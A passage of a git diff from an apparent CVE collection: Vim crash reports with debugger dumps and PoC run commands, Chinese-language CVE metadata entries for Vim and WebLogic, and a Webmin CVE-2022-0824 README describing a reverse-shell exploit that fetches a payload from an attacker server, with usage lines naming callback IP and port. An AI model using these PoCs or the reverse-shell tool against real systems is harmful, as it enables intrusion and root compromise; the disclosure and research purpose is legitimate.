0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587 + #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146 + #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782 + #23 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433 + #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308 + +SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset +==1962298==ABORTING +``` +[poc_nsp01_s.dat](poc_nsp01_s.dat) +## GDB +```bash +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa! + +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468 +1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x00005555562c5854 yank_copy_line+883 je 0x5555562c585e + 0x00005555562c5856 yank_copy_line+885 mov %rdx,%rdi + 0x00005555562c5859 yank_copy_line+888 callq 0x555555696b30 <__asan_report_store8@plt> + 0x00005555562c585e yank_copy_line+893 mov -0x18(%rbp),%rdx + 0x00005555562c5862 yank_copy_line+897 mov %rdx,(%rax) +!0x00005555562c5865 yank_copy_line+900 mov -0x28(%rbp),%rax + 0x00005555562c5869 yank_copy_line+904 mov %rax,%rdx + 0x00005555562c586c yank_copy_line+907 mov %rdx,%rax + 0x00005555562c586f yank_copy_line+910 shr $0x3,%rax + 0x00005555562c5873 yank_copy_line+914 add $0x7fff8000,%rax +─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] break at 0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time +─── Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + rax 0x0000602000007230 rbx 0x0000555556d935e0 rcx 0x0000000000000000 rdx 0x0000602000007250 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007fffffffbb00 rsp 0x00007fffffffbac0 + r8 0x00007ffff7fb8000 r9 0x0000000000000002 r10 0x0000602000007240 r11 0x00000000000000e0 r12 0x00007fffffffbd30 r13 0x00000ffffffff772 r14 0x00007fffffffbb90 r15 0x0000555556d86b60 + rip 0x00005555562c5865 eflags [ PF ZF IF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1463 bd->endspaces = 0; + 1464 if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1)) + 1465 == NULL) + 1466 return FAIL; + 1467 y_current->y_array[y_idx] = pnew; +!1468 vim_memset(pnew, ' ', (size_t)bd->startspaces); + 1469 pnew += bd->startspaces; + 1470 mch_memmove(pnew, bd->textstart, (size_t)bd->textlen); + 1471 pnew += bd->textlen; + 1472 vim_memset(pnew, ' ', (size_t)bd->endspaces); +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290 +[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742 +[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754 +[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123 +[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960 +[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887 +[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850 +[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768 +[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0 +loc pnew = 0x602000007250 "\276\276": 190 '\276' +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +>>> p bd->startspaces +$2 = -1 +>>> +``` +## Impact +This vulnerability is capable of crashing software, modify memory, and possible remote execution. diff --git a/cve/vim/2023/CVE-2023-1264/README.md b/cve/vim/2023/CVE-2023-1264/README.md index df7b85a600b9cf159059f586e4b04f6b011a86c2..418a98735d54110712db1802193eddf4d986ab55 100644 --- a/cve/vim/2023/CVE-2023-1264/README.md +++ b/cve/vim/2023/CVE-2023-1264/README.md @@ -1,108 +1,108 @@ -# CVE-2023-1264 - -NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input. - -## vim version - -``` -commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD) -Author: Yegappan Lakshmanan -Date: Thu Feb 9 12:23:17 2023 +0000 - - patch 9.0.1293: the set_num_option() is too long - - Problem: The set_num_option() is too long. - Solution: Move code to separate functions. (Yegappan Lakshmanan, - closes #11954) -``` - -## Proof of Concept - -``` -➜ src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! -[1] 29650 segmentation fault ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! -``` - -## Debug info - -``` -pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! -Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! -[Thread debugging using libthread_db enabled] -Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". - -Program received signal SIGSEGV, Segmentation fault. -0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145 -2145 int b0 = *p; -LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA -──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────────────────────────────────── - RAX 0x0 -*RBX 0x55555595ad70 ◂— 0x5 - RCX 0x0 - RDX 0x0 - RDI 0x0 -*RSI 0x1 -*R8 0x20f5d46a556c2 -*R9 0x7fffffffb314 ◂— 0x5587847b00007fff -*R10 0x7fffffffb340 ◂— 0x63e4e959 - R11 0x0 -*R12 0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim' -*R13 0x5555558878e6 (main) ◂— endbr64 -*R14 0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64 -*R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f -*RBP 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... -*RSP 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... -*RIP 0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax] -───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────────────────────────────── - ► 0x555555699519 movzx eax, byte ptr [rax] - 0x55555569951c movzx eax, al - 0x55555569951f mov dword ptr [rbp - 4], eax - 0x555555699522 cmp dword ptr [rbp - 4], 0 - 0x555555699526 jne utfc_ptr2len+45 - ↓ - 0x555555699532 cmp dword ptr [rbp - 4], 0x7f - 0x555555699536 jg utfc_ptr2len+76 - ↓ - 0x555555699551 mov rax, qword ptr [rbp - 0x18] - 0x555555699555 mov rdi, rax - 0x555555699558 call utf_ptr2len - - 0x55555569955d mov dword ptr [rbp - 0xc], eax -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────── -In file: /root/test/vim/src/mbyte.c - 2140 */ - 2141 int - 2142 utfc_ptr2len(char_u *p) - 2143 { - 2144 int len; - ► 2145 int b0 = *p; - 2146 #ifdef FEAT_ARABIC - 2147 int prevlen; - 2148 #endif - 2149 - 2150 if (b0 == NUL) -─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── -00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... -01:0008│ 0x7fffffffb458 ◂— 0x0 -02:0010│ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... -03:0018│ 0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4] -04:0020│ rbp 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... -05:0028│ 0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax -06:0030│ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ... -07:0038│ 0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752 -───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── - ► f 0 0x555555699519 utfc_ptr2len+20 - f 1 0x555555638d0c unputcmdline+101 - f 2 0x55555565e74b vgetorpeek+3187 - f 3 0x55555565b8a6 vgetc+250 - f 4 0x55555565bf9e safe_vgetc+17 - f 5 0x5555556aec0f get_number+126 - f 6 0x5555556aedd7 prompt_for_number+115 - f 7 0x55555578f2b8 spell_suggest+2101 -``` - -[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat) - -## Impact - +# CVE-2023-1264 + +NULL Pointer Dereference in function utfc_ptr2len at mbyte.c.c:2145 allows attackers to cause a denial of service (application crash) via a crafted input. + +## vim version + +``` +commit 0caaf1e46511f7a92e036f05e6aa9d5992540117 (HEAD -> master, tag: v9.0.1293, origin/master, origin/HEAD) +Author: Yegappan Lakshmanan +Date: Thu Feb 9 12:23:17 2023 +0000 + + patch 9.0.1293: the set_num_option() is too long + + Problem: The set_num_option() is too long. + Solution: Move code to separate functions. (Yegappan Lakshmanan, + closes #11954) +``` + +## Proof of Concept + +``` +➜ src git:(master) ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! +[1] 29650 segmentation fault ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc.dat -c :qa! +``` + +## Debug info + +``` +pwndbg> r -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! +Starting program: /root/test/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S ../../poc -c :qa! +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGSEGV, Segmentation fault. +0x0000555555699519 in utfc_ptr2len (p=0x0) at mbyte.c:2145 +2145 int b0 = *p; +LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA +──────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────────────────────────────────── + RAX 0x0 +*RBX 0x55555595ad70 ◂— 0x5 + RCX 0x0 + RDX 0x0 + RDI 0x0 +*RSI 0x1 +*R8 0x20f5d46a556c2 +*R9 0x7fffffffb314 ◂— 0x5587847b00007fff +*R10 0x7fffffffb340 ◂— 0x63e4e959 + R11 0x0 +*R12 0x7fffffffe3f8 —▸ 0x7fffffffe6ea ◂— '/root/test/vim/src/vim' +*R13 0x5555558878e6 (main) ◂— endbr64 +*R14 0x555555902038 (__do_global_dtors_aux_fini_array_entry) —▸ 0x55555558aac0 (__do_global_dtors_aux) ◂— endbr64 +*R15 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f +*RBP 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... +*RSP 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... +*RIP 0x555555699519 (utfc_ptr2len+20) ◂— movzx eax, byte ptr [rax] +───────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────────────────────────────────── + ► 0x555555699519 movzx eax, byte ptr [rax] + 0x55555569951c movzx eax, al + 0x55555569951f mov dword ptr [rbp - 4], eax + 0x555555699522 cmp dword ptr [rbp - 4], 0 + 0x555555699526 jne utfc_ptr2len+45 + ↓ + 0x555555699532 cmp dword ptr [rbp - 4], 0x7f + 0x555555699536 jg utfc_ptr2len+76 + ↓ + 0x555555699551 mov rax, qword ptr [rbp - 0x18] + 0x555555699555 mov rdi, rax + 0x555555699558 call utf_ptr2len + + 0x55555569955d mov dword ptr [rbp - 0xc], eax +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────── +In file: /root/test/vim/src/mbyte.c + 2140 */ + 2141 int + 2142 utfc_ptr2len(char_u *p) + 2143 { + 2144 int len; + ► 2145 int b0 = *p; + 2146 #ifdef FEAT_ARABIC + 2147 int prevlen; + 2148 #endif + 2149 + 2150 if (b0 == NUL) +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +00:0000│ rsp 0x7fffffffb450 —▸ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 ◂— ... +01:0008│ 0x7fffffffb458 ◂— 0x0 +02:0010│ 0x7fffffffb460 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... +03:0018│ 0x7fffffffb468 —▸ 0x555555638c90 (putcmdline+100) ◂— mov eax, dword ptr [rbp - 4] +04:0020│ rbp 0x7fffffffb470 —▸ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... +05:0028│ 0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax +06:0030│ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ... +07:0038│ 0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752 +───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + ► f 0 0x555555699519 utfc_ptr2len+20 + f 1 0x555555638d0c unputcmdline+101 + f 2 0x55555565e74b vgetorpeek+3187 + f 3 0x55555565b8a6 vgetc+250 + f 4 0x55555565bf9e safe_vgetc+17 + f 5 0x5555556aec0f get_number+126 + f 6 0x5555556aedd7 prompt_for_number+115 + f 7 0x55555578f2b8 spell_suggest+2101 +``` + +[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat) + +## Impact + NULL Pointer Dereference in function utfc_ptr2len allows attackers to cause a denial of service (application crash) via a crafted input. \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-0288.yaml b/cve/vim/2023/yaml/CVE-2023-0288.yaml index 08329eac674febe2b7f5d153997bcd4193b0467b..92997801bcdd8636cb7c236ffeac566f5c29dedb 100644 --- a/cve/vim/2023/yaml/CVE-2023-0288.yaml +++ b/cve/vim/2023/yaml/CVE-2023-0288.yaml @@ -1,19 +1,19 @@ -id: CVE-2023-0288 -source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/ -info: - name: Vim是一款基于UNIX平台的编辑器。 - severity: high - description: | - GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。 - scope-of-influence: - vim < 9.0.1182 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-0288 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-0288 - cwe-id: CWE-122 - cnvd-id: None - kve-id: None +id: CVE-2023-0288 +source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。 + scope-of-influence: + vim < 9.0.1182 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0288 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0288 + cwe-id: CWE-122 + cnvd-id: None + kve-id: None tags: cve2023, 堆buffer溢出漏洞 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-0512.yaml b/cve/vim/2023/yaml/CVE-2023-0512.yaml index d0060dc5cab2f3325241ac2aa042b697a1238b01..43291f7afe214cd0559960998a3ed71ec3061e93 100644 --- a/cve/vim/2023/yaml/CVE-2023-0512.yaml +++ b/cve/vim/2023/yaml/CVE-2023-0512.yaml @@ -1,19 +1,19 @@ -id: CVE-2023-0512 -source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/ -info: - name: Vim是一款基于UNIX平台的编辑器。 - severity: high - description: | - vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。 - scope-of-influence: - vim < 9.0.1247 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-0512 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-0512 - cwe-id: CWE-369 - cnvd-id: None - kve-id: None +id: CVE-2023-0512 +source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。 + scope-of-influence: + vim < 9.0.1247 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0512 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0512 + cwe-id: CWE-369 + cnvd-id: None + kve-id: None tags: cve2023, 除零错误 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1264.yaml b/cve/vim/2023/yaml/CVE-2023-1264.yaml index 569d8a34917fa7320d97223d29b6355ff12f6a11..6669ae9cd69445482f83f9d515343be3c36b93cf 100644 --- a/cve/vim/2023/yaml/CVE-2023-1264.yaml +++ b/cve/vim/2023/yaml/CVE-2023-1264.yaml @@ -1,20 +1,20 @@ -id: CVE-2023-1264 -source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/ -info: - name: Vim是一款基于UNIX平台的编辑器。 - severity: medium - description: | - NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392. - scope-of-influence: - vim < 9.0.1392 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-1264 - - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 5.5 - cve-id: CVE-2023-1264 - cwe-id: CWE-476 - cnvd-id: None - kve-id: None +id: CVE-2023-1264 +source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: medium + description: | + NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392. + scope-of-influence: + vim < 9.0.1392 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-1264 + - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2023-1264 + cwe-id: CWE-476 + cnvd-id: None + kve-id: None tags: cve2023, 空指针解引用 \ No newline at end of file diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml index 94ff4774967add68f7a8a3d35fd30f4aba41c061..594d11ac9852f71b2e4dcdef535b707cea769507 100644 --- a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml +++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml @@ -1,23 +1,23 @@ -id: CVE-2020-14882 -source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py -info: - name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 - severity: critical - description: | - CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台 - scope-of-influence: - weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 - reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-14882 - https://www.oracle.com/security-alerts/cpuoct2020.html - http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html - http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-14882 - cwe-id: None - cnvd-id: None - kve-id: None +id: CVE-2020-14882 +source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py +info: + name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: critical + description: | + CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 + reference: + https://nvd.nist.gov/vuln/detail/CVE-2020-14882 + https://www.oracle.com/security-alerts/cpuoct2020.html + http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html + http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html + http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-14882 + cwe-id: None + cnvd-id: None + kve-id: None tags: cve2020, Weblogic \ No newline at end of file diff --git a/cve/webmin/2022/CVE-2022-0824/README.md b/cve/webmin/2022/CVE-2022-0824/README.md old mode 100755 new mode 100644 index 7b23df2885b1a89a4674759cfa93c132921826a5..9b20e2be0d8bec751c4036e028127fed5bb68604 --- a/cve/webmin/2022/CVE-2022-0824/README.md +++ b/cve/webmin/2022/CVE-2022-0824/README.md @@ -1,58 +1,58 @@ -# Webmin-CVE-2022-0824-revshell - - -## Vulnerability Description - -Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) -Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. -_Source: https://www.webmin.com/security.html_ - -## Exploit Description - -This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges. - -_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_ - -## Usage - - $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT] - $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444 - - $~ python3 Webmin-revshell.py -h - usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V] - - Webmin CVE-2022-0824 Reverse Shell - - optional arguments: - -h, --help show this help message and exit - -t TARGET, --target TARGET - Target full URL, https://www.webmin.local:10000 - -c CREDENTIAL, --credential CREDENTIAL - Format, user:user123 - -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER - Http server for serving payload, ex 192.168.5.120:8080 - -L CALLBACK_IP, --callback_ip CALLBACK_IP - Callback IP to receive revshell - -P CALLBACK_PORT, --callback_port CALLBACK_PORT - Callback port to receive revshell - -V, --version show program's version number and exit - -## PoC - - target host: https://192.168.5.118:10000 - attacker host: 192.168.5.120 - - -https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4 - - -## Tested on - - - Webmin 1.984 - - Ubuntu 18.04 - - Kali 2021.3 - - -## Disclaimer: - - The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities +# Webmin-CVE-2022-0824-revshell + + +## Vulnerability Description + +Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) +Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. +_Source: https://www.webmin.com/security.html_ + +## Exploit Description + +This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges. + +_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_ + +## Usage + + $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT] + $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444 + + $~ python3 Webmin-revshell.py -h + usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V] + + Webmin CVE-2022-0824 Reverse Shell + + optional arguments: + -h, --help show this help message and exit + -t TARGET, --target TARGET + Target full URL, https://www.webmin.local:10000 + -c CREDENTIAL, --credential CREDENTIAL + Format, user:user123 + -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER + Http server for serving payload, ex 192.168.5.120:8080 + -L CALLBACK_IP, --callback_ip CALLBACK_IP + Callback IP to receive revshell + -P CALLBACK_PORT, --callback_port CALLBACK_PORT + Callback port to receive revshell + -V, --version show program's version number and exit + +## PoC + + target host: https://192.168.5.118:10000 + attacker host: 192.168.5.120 + + +https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4 + + +## Tested on + + - Webmin 1.984 + - Ubuntu 18.04 + - Kali 2021.3 + + +## Disclaimer: + + 